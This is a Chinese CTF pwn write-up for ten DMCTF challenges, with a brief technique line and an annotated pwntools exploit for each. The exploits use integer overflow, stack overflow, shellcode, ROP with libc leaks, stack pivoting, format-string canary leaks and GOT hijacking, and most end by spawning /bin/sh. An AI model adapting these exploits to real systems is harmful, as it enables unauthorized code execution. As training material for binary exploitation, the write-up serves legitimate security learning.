以下各题均请注意 glibc 版本问题

intoverflow

整数溢出绕过,跳转到后门函数

exp:

#!/usr/bin/python
#coding:utf-8
from pwn import*

# Spawn the local challenge binary (Python 2 / pwntools-era script: payloads are str).
p=process('./intoverflow')
# Address the overwritten return address points at. The name says "system",
# but the script only shows a fixed address in the binary's text range —
# presumably the backdoor function the writeup mentions (TODO confirm).
system_addr = 0x8048645
p.recvuntil("Now,we need a password")
# 0x15 filler bytes, 4 more bytes (presumably the saved ebp slot), then the
# return address as a 32-bit little-endian value.
payload = 'a' * 0x15 + 'b' * 4 + p32(system_addr)
# Pad to exactly 261 bytes; per the writeup the length check is bypassed by
# an integer overflow, so the total length matters (TODO confirm 261 in the binary).
payload += 'a' * (261 - len(payload))
p.send(payload)
p.interactive()

stackoverflow

栈溢出跳转至后门函数

exp:

#!/usr/bin/python
#coding:utf-8
from pwn import*

# Address the overwritten return address points at (the writeup calls it the
# backdoor function; this script only shows the constant — TODO confirm).
system_addr = 0x4006ba
p = process('./stackoverflow')
#p = remote()
p.recvuntil('Welcome to DMCTF,please input your name!')
# 0x10 bytes of buffer, 8 more bytes (presumably the saved rbp slot), then the
# 64-bit return address.
payload = 'a' * 0x10 + 'b' * 8 + p64(system_addr)
p.sendline(payload)
p.interactive()

shellcode

程序泄露buf地址,发送shellcode,跳转到shellcode执行

exp:

#!/usr/bin/python
#coding:utf-8

from pwn import*

p =process('./shellcode')
context.log_level = 'DEBUG'
# shellcraft/asm below emit amd64 code, so the arch must be set before they run.
context.arch = 'amd64'


#p.recvline()
# The first line the program prints is parsed as a hex address: characters
# 0..13 are taken as "0x" + 12 hex digits (assumes exactly that formatting —
# TODO confirm against the binary's output).
ret_addr = int(p.recvline()[0:14],16)
shellcode = asm(shellcraft.amd64.sh())
print hex(ret_addr)

# Shellcode first, padded to 0x90+8 bytes (buffer plus, presumably, the saved
# rbp slot), then the leaked buffer address as the return address so execution
# lands on the shellcode.
# NOTE: if the shellcode were longer than 0x98 bytes the padding would silently
# be empty and the layout below would be wrong.
payload = shellcode
payload += 'a' * (0x90+8-len(shellcode))
payload += p64(ret_addr)

p.sendline(payload)
p.interactive()

Admin Panel

利用整数溢出突破输入长度限制进行栈溢出。

exp:

from pwn import *

# Thin wrappers around the tube; every payload goes through str() (Python 2 /
# pwntools-era script where str is bytes).
s = lambda data: p.send(str(data))
sa = lambda delim,data: p.sendafter(delim,str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim,data: p.sendlineafter(delim,str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims,drop=True: p.recvuntil(delims,drop)
# Unpack a <=8-byte little-endian leak, zero-padded on the right.
uu64 = lambda data: u64(data.ljust(8,'\0'))
leak = lambda name,addr: log.success('{} = {:#x}'.format(name, addr))

#context.log_level = 'DEBUG'
binary = './admin_panel'
# context.binary lets pwntools take arch/word size from the ELF, which is
# what flat() below relies on when packing the address.
context.binary = binary
elf = ELF(binary,checksec=False)
p = process(binary)

sla('Username: ', 'merc')
# 0x19+4 bytes of filler (buffer plus, presumably, the saved ebp slot), then
# the target address 0x804864b (looks like a 32-bit text address). ljust pads
# to 260 bytes because, per the writeup, the length limit is defeated by an
# integer overflow (TODO confirm the 260 in the binary).
payload = flat('a'*(0x19+4), 0x804864b).ljust(260, 'a')
sla('Password: ', payload)

p.interactive()

shutup

利用栈溢出调用 read 读取 shellcode 到 bss 段,最后跳转到 bss 段执行 shellcode。

exp:

from pwn import *

# Thin wrappers around the tube; every payload goes through str() (Python 2 /
# pwntools-era script where str is bytes).
s = lambda data: p.send(str(data))
sa = lambda delim,data: p.sendafter(delim,str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim,data: p.sendlineafter(delim,str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims,drop=True: p.recvuntil(delims,drop)
# Unpack a <=8-byte little-endian leak, zero-padded on the right.
uu64 = lambda data: u64(data.ljust(8,'\0'))
leak = lambda name,addr: log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
binary = './shutup'
context.binary = binary
elf = ELF(binary,checksec=False)
p = process(binary)

# Gadget used as read()'s return address; presumably pops three registers and
# returns, which removes the three arguments from the stack (TODO confirm).
pop3 = 0x8048539
# 0x18+4 bytes of filler (buffer plus, presumably, the saved ebp slot), then a
# call to read(0, bss, 0x100) laid out cdecl-style (return address = pop3,
# then the three arguments), and finally a return into .bss where read()
# stores its input.
s(flat('a'*(0x18+4), elf.plt['read'], pop3, 0, elf.bss(), 0x100, elf.bss()))
# Consumed by that read(): the shellcode that ends up in .bss.
s(asm(shellcraft.sh()))

p.interactive()

babystack

简单的rop链构造

exp:

 #coding=utf-8
from pwn import *
from LibcSearcher import*
context.log_level='debug'

# `REMOTE=1` on the command line (pwntools args) targets the CTF service;
# otherwise the local binary is run. Indentation restored from the page.
if args['REMOTE']:
    p = remote('dmctf.vaala.cloud',28182)
else:
    p = process("./babystack")


def main():
    """Two-stage ROP against ./babystack using the module-level tube ``p``.

    Stage 1 leaks the GOT entry of __libc_start_main through write() and
    returns to main for a second overflow; stage 2 resolves system and
    "/bin/sh" through LibcSearcher and calls system("/bin/sh").
    (Indentation restored from the page.)
    """
    elf=ELF('./babystack')
    pop_rbp_ret=0x0000000000400520   # not used below
    pop_rdi_ret=0x0000000000400663
    write_plt=elf.plt['write']
    libc_start_main_got=elf.got['__libc_start_main']

    p.recvuntil("PWNME,PWNME,PWMME!!!\n")

    # gdb.attach(p)
    # Address of the binary's main(). The local name shadows this function's
    # own name — harmless here, but easy to misread.
    main=0x00000000004005B6
    rsi_r15_ret=0x0000000000400661
    # Stage 1: 0x18 bytes of filler, then write(1, &got[__libc_start_main], rdx)
    # — rdi=1, rsi=GOT slot (the pop rsi gadget also pops r15, hence the extra
    # 0); rdx is NOT set by this chain, so the length is whatever was left in
    # rdx. Finally return to main so a second overflow is possible.
    payload1='a'*0x18+p64(pop_rdi_ret)+p64(1)+p64(rsi_r15_ret)+p64(libc_start_main_got)+p64(0)+p64(write_plt)+p64(main)

    p.sendline(payload1)

    # p.recv()
    # Read the leaked GOT entry: the 6 significant bytes of a 64-bit address,
    # zero-padded. (The original comment said "the GOT address of write()",
    # but the value written out is __libc_start_main's GOT entry.)
    libc_start_main_add=u64(p.recv(6).ljust(8,"\x00"))

    print "libc_start_main_add="+hex(libc_start_main_add)
    # Resolve the libc from the leak; this depends on LibcSearcher's database
    # matching the target's glibc (hence the version note at the top of the page).
    libc=LibcSearcher('__libc_start_main',libc_start_main_add)
    libc_base=libc_start_main_add-libc.dump('__libc_start_main')
    system_addr=libc_base+libc.dump('system')
    bin_addr=libc_base+libc.dump('str_bin_sh')
    print ("system_addr = "+hex(system_addr))
    print ("bin_addr = "+hex(bin_addr))
    p.recv()
    # Stage 2: the same 0x18 bytes of filler, then system("/bin/sh").
    payload2='a'*0x10+'a'*8+p64(pop_rdi_ret)+p64(bin_addr)+p64(system_addr)
    p.sendline(payload2)
    p.interactive()

# Script entry point (indentation restored from the page).
if __name__ == '__main__':
    main()

easyStack

简单的栈迁移(libc为2.27)

exp:

#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

# p = process('./pwn', env={'LD_PRELOAD':'./libc.so.6'})
p = remote("dmctf.vaala.cloud", 28382)
elf = ELF('./pwn')

pwn_addr = 0x4006AE   # not used below
pop_rdi = 0x0000000000400803
pop_rsi_ret = 0x0000000000400801
leave_ret = 0x000000000040071f
# Two writable addresses in the binary (0x601xxx, presumably .data/.bss) used
# as fake stack frames for the pivot. From the chain below it looks like the
# 'name?' input is stored at `one` and the 'something?' input at `two` —
# inferred, confirm in the binary.
one = 0x601160
two = 0x601060

if __name__ == "__main__":
    # gdb.attach(p, 'b *0x40071F\n')
    # Frame 1: fake saved rbp = two, then puts(got[puts]) to leak libc, then
    # leave;ret to pivot into the frame at `two`.
    payload = p64(two) + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(leave_ret)
    p.sendafter('name?', payload)
    # Frame 2: fake saved rbp = one, then read(0, one+8, rdx) — rdi=0,
    # rsi=one+8 (the pop rsi gadget pops one more word, hence the extra 0);
    # rdx is not set here, so this relies on the leftover value being large
    # enough. Then leave;ret again so the word read into one+8 becomes the
    # next return address.
    payload = p64(one) + p64(pop_rdi) + p64(0) + p64(pop_rsi_ret) + p64(one + 8) + p64(0) + p64(elf.plt['read']) + p64(leave_ret)
    p.sendafter('something?', payload)
    # Third input: 0x10 filler, saved rbp overwritten with `one`, and a single
    # byte that rewrites the low byte of the return address to 0x1f —
    # presumably turning it into leave_ret (0x40071f); TODO confirm.
    payload = 'a' * 0x10 + p64(one) + '\x1f'
    p.sendafter('Bye?', payload)
    # puts() prints the GOT entry; the 6 bytes ending in 0x7f are the address.
    leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    # 0x80aa0: offset of puts in the challenge libc (2.27 per the writeup).
    # Only valid for that exact build — verify against the provided libc.
    libc_base = leak - 0x80aa0
    success('PUTS: ' + str(hex(leak)))
    success('LIBC: ' + str(hex(libc_base)))
    # one_gadget offsets for the same libc build; og[2] is the one used.
    # Consumed by the read() above, i.e. written to one+8.
    og = [0x4f3d5, 0x4f432, 0x10a41c]
    payload = p64(og[2] + libc_base)
    p.send(payload)
    p.interactive()

flag_shop

配合 work 和 buy 功能将钱数降至 0,这样就能构造出包含 $0; 的字符串,然后用寄存器传参把 $0 给 system 调用即可。

exp:

from pwn import *

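# Thin wrappers around the tube; every payload goes through str() (Python 2 /
# pwntools-era script where str is bytes).
s = lambda data: p.send(str(data))
sa = lambda delim,data: p.sendafter(delim,str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim,data: p.sendlineafter(delim,str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims,drop=True: p.recvuntil(delims,drop)
# Unpack a <=8-byte little-endian leak, zero-padded on the right.
uu64 = lambda data: u64(data.ljust(8,'\0'))
leak = lambda name,addr: log.success('{} = {:#x}'.format(name, addr))

#context.log_level = 'DEBUG'
binary = './flag_shop'
context.binary = binary
elf = ELF(binary,checksec=False)
p = process(binary)

# Menu option 5 shows the balance. Only ONE character is read, so this
# assumes the starting balance is a single digit (TODO confirm in the binary).
sla('Exit\n', '5')
ru('have $')
money = int(r(1))
# Answering yes here is taken (per the writeup's "work") to add $1.
sla('[yes/no]', 'yes')
money += 1

# Each buy (option 1 + yes) is taken to cost $2; drive the balance to 0 so the
# stored message ends up containing "$0;" (see the writeup).
# Floor division keeps `times` an int on Python 3 too; on Python 2 the
# original `/` already floored for ints, so behaviour there is unchanged.
times = money // 2
for _ in range(times):
    sla('Exit\n', '1')
    sla('[yes/no]', 'yes')

# msg: address of the stored message in the binary; msg+15 is presumably where
# the "$0;" text starts (TODO confirm the 15-byte prefix).
msg = 0x602080
pop_rdi = 0x400e03
sla('Exit\n', '1')
# The [yes/no] answer of option 1 overflows: 0x50+8 bytes of filler (buffer
# plus, presumably, the saved rbp slot), then pop rdi; system(msg+15).
payload = flat('a'*(0x50+8), pop_rdi, msg+15, elf.plt['system'])
sla('[yes/no]', payload)

# Option 6 is taken to return from the vulnerable function and fire the chain.
sl('6')

p.interactive()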

马大师的绝招

格式化字符串漏洞和栈溢出。

格式化字符串漏洞可以泄露canary和libc地址,栈溢出劫持执行流。

exp:

#coding=utf-8
from pwn import *

context.log_level="debug"

# local=1 runs the binary from the working directory; the remote branch still
# carries placeholder host/port ("", 0) and must be filled in before use.
# Both branches load the SYSTEM libc, so every libc offset below assumes the
# target's glibc matches it (see the version note at the top of the page).
# Indentation restored from the page.
local=0
if local:
    p=process("pwn-end")
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p=remote("",0)
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

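# Convert a hex string to int, echoing the value (translated: "string to
# int, includes one print").
def get_int(content):
    """Parse ``content`` as a base-16 string and return the integer.

    Accepts the digits with or without a ``0x`` prefix (``int(..., 16)``
    handles both). Also prints the value in hex; the message is built by
    concatenation so it reads the same under Python 2 — where the original
    ``print("...", out)`` printed a tuple repr — and Python 3.

    Raises ValueError when ``content`` is not valid hex.
    """
    content=int(content,16)
    out=hex(content)
    print("content to int end is : "+out)
    return content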

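def get_formate_result(spli="0x",length=12):
    """Receive from the global tube ``p`` up to the next ``spli`` delimiter and
    return at most ``length`` characters of what preceded it (delimiter dropped).

    After a ``%p%p`` leak the first call therefore returns the (normally
    empty) text before the first ``0x`` and the second call returns the hex
    digits of the first pointer. The original ignored ``spli`` and hard-coded
    ``"0x"``, and passed ``drop="true"`` (a truthy str rather than a bool);
    both are fixed here, and behaviour with the default arguments is unchanged.
    """
    info=p.recvuntil(spli,drop=True)
    info=info[0:length]
    # Concatenate rather than print a tuple so Python 2 shows a plain line.
    print("leak info (may set a and b to get real info) : "+str(info))
    return info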



p.recvuntil("!!!!!!!\n")

#gdb.attach(p,"b *0x00000000004007EE")
# Format-string leak: %21$p and %15$p print two stack words, which the writeup
# identifies as a libc pointer and the canary (the positions are specific to
# this binary).
p.send("%21$p%15$p")


# First call returns whatever precedes the first "0x" (normally nothing);
# the second returns the 12 hex digits of the first pointer.
info=get_formate_result()
info=get_formate_result() #libc
# 0x20840: presumably the offset of the leaked pointer inside libc — valid
# only for the exact libc build loaded above (TODO verify).
libc.address=get_int(info)-0x20840
# The 16 hex digits after the second "0x" are the canary.
info=p.recv(16)

canary=get_int(info)
#content=p.recv(32)
p.recvuntil("flag!!!\n")
# 0x38 bytes of filler, the canary back in its slot, a second copy (presumably
# filling the saved rbp slot), then a gadget at 0x4008f3 (presumably
# pop rdi; ret — not shown on this page) handing "/bin/sh" to system().
# libc.search(...).next() is Python 2 iterator syntax.
payload="a"*0x38+p64(canary)+p64(canary)+p64(0x00000000004008f3)+p64(libc.search("/bin/sh").next())+p64(libc.symbols["system"])
p.sendline(payload)

p.interactive()

接化发

利用任意地址写泄露 libc 并进行 GOT 劫持。

exp:

# encoding: utf-8
from pwn import *

# Thin wrappers around the tube; every payload goes through str() (Python 2 /
# pwntools-era script where str is bytes, so system[i] below is one byte).
s = lambda data: p.send(str(data))
sa = lambda delim,data: p.sendafter(delim,str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim,data: p.sendlineafter(delim,str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims,drop=True: p.recvuntil(delims,drop)
# Unpack a <=8-byte little-endian leak, zero-padded on the right.
uu64 = lambda data: u64(data.ljust(8,'\0'))
leak = lambda name,addr: log.success('{} = {:#x}'.format(name, addr))

#context.log_level = 'DEBUG'
binary = './pwn'
context.binary = binary
elf = ELF(binary,checksec=False)
libc = ELF('./libc-2.23.so', checksec=False)
# LD_PRELOAD forces the challenge's libc so the symbol offsets below match it.
p = process(binary, env={'LD_PRELOAD': './libc-2.23.so'})

# The first prompt's input is stored by the program; after the GOT swap below,
# a printf() of that stored string becomes system("/bin/sh;").
sla(':', '/bin/sh;')

# Addresses in the binary's data: `attack` is where the write cursor starts,
# `stdin` the program's stdin FILE* pointer, `printf` its GOT slot.
# The menu semantics are inferred from the loops below (confirm in the binary):
# option 2 moves the cursor down one byte, 1 moves it up one byte,
# 5 reads the byte at the cursor, 6 writes one byte there.
attack = 0x602120
stdin = 0x6020b0
printf = elf.got['printf']

# Walk the cursor from `attack` down to the stdin pointer.
# (Indentation of the loops restored from the page.)
for i in range(attack-stdin):
    ru('>\n')
    sl('2')

# Read the 6 significant bytes of the stdin pointer, one byte per round,
# advancing the cursor (option 1) after each read.
addr = ''
for i in range(6):
    ru('>\n')
    sl('5')
    addr += r(1)
    ru('>\n')
    sl('1')

addr = uu64(addr)
leak('stdin', addr)
# The pointer is _IO_2_1_stdin_ inside libc-2.23.so, so its symbol offset
# yields the base.
base = addr - libc.sym['_IO_2_1_stdin_']
leak('base', base)
system = p64(base + libc.sym['system'])

# The reads above left the cursor 6 bytes past `stdin`; move it down to
# printf's GOT entry.
for i in range(stdin-printf+6):
    ru('>\n')
    sl('2')

# Overwrite printf@got with system's address byte by byte (option 6 writes one
# byte, option 1 advances); the sixth byte is written without a final advance.
for i in range(5):
    ru('>\n')
    sl('6')
    s(system[i])
    ru('>\n')
    sl('1')

ru('>\n')
sl('6')
s(system[5])

# Option 7 (inferred) makes the program printf() the stored string, which now
# reaches system("/bin/sh;").
sl('7')

p.interactive()